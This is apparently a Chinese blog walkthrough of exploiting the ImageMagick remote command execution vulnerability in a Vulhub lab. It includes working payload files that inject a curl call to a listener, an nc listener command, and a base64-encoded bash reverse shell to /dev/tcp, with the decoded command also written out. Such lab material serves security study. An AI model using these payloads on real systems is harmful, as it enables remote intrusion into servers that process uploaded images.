美文网首页
ImageMagick 远程命令执行漏洞

ImageMagick 远程命令执行漏洞

作者: IT胖 | 来源:发表于2019-09-27 15:43 被阅读0次

一、Vulhub靶场搭建
二、漏洞利用
2.1 、运行漏洞环境

#进入漏洞环境所在路径
cd /vulhub/imagemagick/imagemagick
#运行漏洞环境
docker-compose build && docker-compose up -d

2.2、构造POC文件,命名为test.jpg,脚本内容如下

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/joker.jpg"|curl "192.168.159.128:2233)'
pop graphic-context

注:脚本中192.168.159.128:2233为另一台机器的ip和端口号,改为自己的,如使用阿里云等,记得配置安全规则

2.3、开启端口监听,在192.168.159.128机器上输入nc -lvp 2233
2.4、访问漏洞环境上传POC:http://192.168.159.66/upload.php

如图所示,在192.168.159.128上可监听到URL请求数据,但无回显可使用其他POC

无回显

反弹shell,POC脚本如下,其中echo后是经过base64编码的 /bin/bash -i >& /dev/tcp/192.168.236.138/8889 0>&1 请根据实际使用IP重新编码

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM2LjEzOC84ODg5IDA+JjE | base64 -d | bash`"||id " )'
pop graphic-context
image.png

若出现以下错误可能跟系统有关,建议在server 2008或linux中进行测试

image.png

参考地址:http://www.freesion.com/article/698851244/

相关文章

网友评论

      本文标题:ImageMagick 远程命令执行漏洞

      本文链接:https://www.haomeiwen.com/subject/lbdbuctx.html